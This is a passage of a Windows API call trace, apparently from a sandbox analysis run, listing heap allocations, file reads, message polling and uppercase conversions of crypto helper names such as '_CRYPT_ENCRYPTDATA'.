lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0190.867] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0190.867] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0190.867] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0190.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0190.868] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.868] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2cc4, lpOverlapped=0x0) returned 1 [0190.870] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2cc4) returned 0x900190 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0190.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2cc4) returned 0x902e60 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.871] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2cc4) returned 0x900190 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.871] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0190.871] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0190.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.871] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2cc4) returned 0x900190 [0190.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0190.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0190.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2cc4) returned 0xbea018 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0190.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0190.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0190.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0190.873] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0190.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0190.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.874] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0190.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.874] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0190.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.875] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0190.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.875] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0190.876] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) 